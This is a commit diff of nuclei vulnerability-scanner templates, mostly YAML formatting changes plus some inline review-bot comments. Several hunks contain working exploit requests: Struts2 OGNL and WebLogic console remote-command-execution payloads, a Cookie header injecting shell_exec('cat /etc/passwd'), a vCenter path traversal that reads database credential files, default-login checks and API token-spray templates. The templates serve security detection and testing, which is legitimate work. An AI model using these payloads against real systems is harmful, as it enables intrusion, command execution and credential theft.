Merge pull request #2844 from projectdiscovery/more-fixes

Changes to adopt v2.5.3 engine
patch-1
Sandeep Singh 2021-10-21 07:21:20 +05:30 committed by GitHub
commit a21cec6362
85 changed files with 129 additions and 79 deletions


@ -14,8 +14,3 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
files:
- "token-spray/"


@ -11,25 +11,19 @@ info:
requests:
- raw:
- |
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
- |
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
- |
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
payloads:
params:
@ -40,11 +34,12 @@ requests:
matchers-condition: and
matchers:
- type: status
condition: or
status:
- 200
- 400
condition: or
- type: regex
part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
part: body
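Review bot: The body regex on the last lines of the hunk accepts only a one-to-four digit id followed by a `[a-z0-9]+` name, so output such as `uid=65534(nobody)` or an account name containing `-` or `_` would not be matched, presumably leaving a real hit unreported. `- "((u|g)id|groups)=[0-9]+\\([a-zA-Z0-9_.-]+\\)"` keeps the same shape while covering those cases. The `payloads.params` list of this request is cut off at the hunk boundary.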


@ -91,15 +91,16 @@ requests:
- webviewer
- welcome
attack: sniper
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- "environment variable"
- "display library search paths"
condition: and
- "display library search paths"


@ -22,14 +22,16 @@ requests:
payloads:
ids: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Dashboard</title>"


@ -28,8 +28,7 @@ requests:
- |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
cmd: §exec§
Connection: close
cmd: {{exec}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@ -41,12 +40,12 @@ requests:
matchers-condition: and
matchers:
- type: regex
condition: or
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status
status:


@ -31,11 +31,12 @@ requests:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
attack: sniper
matchers-condition: and
matchers:
- type: regex
condition: or
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"


@ -22,6 +22,8 @@ requests:
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
skip-variables-check: true
matchers-condition: and
matchers:
- type: status
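Review bot: `skip-variables-check: true` on the fourth line of the hunk has no comment explaining why it is needed, and the same bare flag appears in the section near the end of this commit whose Cookie header carries a `{{shell_exec(...)}}` expression. Without the note a maintainer tidying the template may remove the flag, and the engine would then presumably reject the `{{228*'98'}}` in the two paths as an unresolved nuclei variable and refuse to load the template. Suggest `# {{228*'98'}} is sent to the target verbatim; it is not a nuclei variable, so skip the unresolved-variable check` directly above the flag. The request block continues outside the hunk (the `matchers` list is cut off).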


@ -1,4 +1,5 @@
id: grafana-default-login
info:
name: Grafana Default Login
author: pdteam
@ -26,7 +27,6 @@ requests:
username:
- admin
- admin
password:
- prom-operator
- admin
@ -35,16 +35,14 @@ requests:
matchers:
- type: word
words:
- grafana_session
- "grafana_session" # Login cookie
part: header
# Check for 'grafana_session' cookie on valid login in the response header.
- type: word
words:
- Logged in
part: body
# Check for valid string on valid login.
words:
- "Logged in" # Logged in keyword
- type: status
status:
- 200
- 200


@ -20,15 +20,13 @@ requests:
username:
- admin
attack: sniper
matchers-condition: and
matchers:
- type: word
condition: and
words:
- '"redirect": "/htdocs/pages/main/main.lsp"'
- '"error": ""'
condition: and
- type: status
status:


@ -18,22 +18,21 @@ requests:
payloads:
password:
- 12345
attack: sniper
- "12345"
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "session_id="
- "resource"
condition: and
- type: word
words:
- "Invalid Password"
part: body
negative: true
words:
- "Invalid Password"
- type: status
status:


@ -23,17 +23,17 @@ requests:
payloads:
path: helpers/wordlists/adminer-paths.txt
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "- Adminer</title>"
- "partial(verifyVersion, "
condition: and
- "partial(verifyVersion"
- type: status
status:
- 200


@ -14,12 +14,10 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept-Language: en-US,en;q=0.9
Connection: close
payloads:
mdbPaths: helpers/wordlists/mdb-paths.txt
attack: sniper
threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true


@ -1,4 +1,5 @@
id: prestashop-module-fuzz
info:
name: Prestashop Modules Enumeration
author: meme-lord
@ -16,19 +17,18 @@ requests:
payloads:
path: helpers/wordlists/prestashop-modules.txt
attack: sniper
threads: 50
threads: 50
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "<module>"
- "<name>"
- "<displayName>"
- "<is_configurable>"
- "</module>"
condition: and
- type: status
status:


@ -1,4 +1,5 @@
id: wordpress-plugins-detect
info:
name: WordPress Plugins Detection
author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and
matchers:
- type: status
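Review bot: If `redirects: true` and `max-redirects: 1` are on the removed side of this hunk (the old/new side of those lines is not recoverable from this rendering, but the hunk shrinks from 11 to 8 lines), the status matcher that follows will no longer see a 200 for plugin paths the server answers with a redirect, so detection coverage may drop; the wordpress-themes-detect section below makes the same change. If not following redirects is intentional, a short comment such as `# redirects deliberately not followed: a redirected plugin path is treated as absent` would make the trade-off explicit for the next editor. The `matchers` list continues outside the hunk.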


@ -1,4 +1,5 @@
id: wordpress-themes-detect
info:
name: WordPress Theme Detection
author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and
matchers:
- type: status


@ -14,6 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
threads: 50
payloads:
path:
- /
@ -63,9 +64,6 @@ requests:
- /webticket/webticketservice.svcabs/
- /adfs/services/trust/2005/windowstransport
attack: sniper
threads: 50
matchers-condition: and
matchers:
- type: dsl


@ -1,15 +1,19 @@
## About
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
## Usage
You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
```bash
# Run Nuclei specifying all the api templates:
token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
```console
# Running token-spray templates against a single token to test
nuclei -t token-spray/ -var token=random-token-to-test
# Running token-spray templates against a file containing multiple new line delimited tokens
nuclei -t token-spray/ -var token=file_with_tokens.txt
```
## Credits
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,asana
self-contained: true
requests:
- method: GET
path:
@ -16,6 +17,6 @@ requests:
matchers:
- type: status
negative: true
status:
- 401
negative: true


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bing,maps,bingmaps
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bitly
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buildkite
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buttercms
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,calendly
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,circle,circleci
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,deviantart
self-contained: true
requests:
- method: POST
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,dropbox
self-contained: true
requests:
- method: POST
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,github
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,autocomplete
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,directions
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,elevation
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,fcm,firebase,cloud,messaging
self-contained: true
requests:
- method: POST
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,find,text
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,distance,matrix
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,geocode
self-contained: true
requests:
- method: GET
path:


@ -6,19 +6,21 @@ info:
severity: info
tags: token-spray,google,geolocation
self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
matchers-condition: and
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'error'
negative: true
- type: status
negative: true
status:
- 404
negative: true


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,nearby
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,roads
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,place,details
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,places,photo
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,playable,locations
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,route
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,speed,limit
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,streetview
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,timezone
self-contained: true
requests:
- method: GET
path:


@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,places,text
self-contained: true
requests:
- method: GET
path:
@ -14,6 +15,6 @@ requests:
matchers:
- type: word
part: body
negative: true
words:
- 'error_message'
negative: true


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,heroku
self-contained: true
requests:
- method: POST
path:
@ -17,9 +18,9 @@ requests:
matchers:
- type: status
condition: or
status:
- 200
- 201
- 202
- 206
condition: or


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,hubspot
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,instagram,graph
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,ipstack
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,iterable
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,jumpcloud
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,lokalise
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,loqate
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailchimp
self-contained: true
network:
- inputs:
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailgun
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mapbox
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,newrelic,nerdgraph
self-contained: true
requests:
- method: POST
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,node,npm,package,manager
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weather,openweather
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pagerduty
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pendo
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pivotaltracker
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,postmark
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sendgrid
self-contained: true
network:
- inputs:
- data: "ehlo\r\n"


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,slack
self-contained: true
requests:
- method: POST
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sonarcloud
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,spotify
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,square
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,stripe
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,tinypng
self-contained: true
requests:
- method: POST
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,travis
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,twitter
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,visualstudio,microsoft
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,wakatime
self-contained: true
requests:
- method: GET
path:


@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weglot
self-contained: true
requests:
- method: POST
path:


@ -7,17 +7,19 @@ info:
severity: info
tags: token-spray,youtube
self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
matchers-condition: or
matchers-condition: or
matchers:
- type: word
part: body
words:
- 'quotaExceeded'
- type: status
status:
- 200


@ -16,10 +16,9 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
threads: 50
payloads:
user: helpers/wordlists/user-list.txt
attack: sniper
threads: 50
matchers-condition: and
matchers:


@ -15,10 +15,9 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
threads: 50
payloads:
uid: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
matchers-condition: and
matchers:


@ -12,6 +12,8 @@ requests:
- "{{BaseURL}}"
headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
skip-variables-check: true
matchers-condition: and
matchers:
- type: status


@ -33,7 +33,7 @@ requests:
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email"
test@{{randstr.tld}}
test@{{randstr}}.tld
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid"


@ -12,7 +12,7 @@ info:
requests:
- raw:
- |
GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1
GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
Host: {{Hostname}}
payloads:
@ -20,14 +20,13 @@ requests:
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
attack: sniper
matchers-condition: and
matchers:
- type: regex
regex:
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
part: body
- type: status
status:
- 200
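Review bot: The trailing comment on the third payload path in this hunk, `# vCenter Server => 6.0`, reads as an implication arrow rather than a version range; `# vCenter Server >= 6.0` (or `6.0 and later`) is presumably intended, matching the `5.5 and earlier` wording of the first entry. The `payloads` mapping this list belongs to starts outside the hunk.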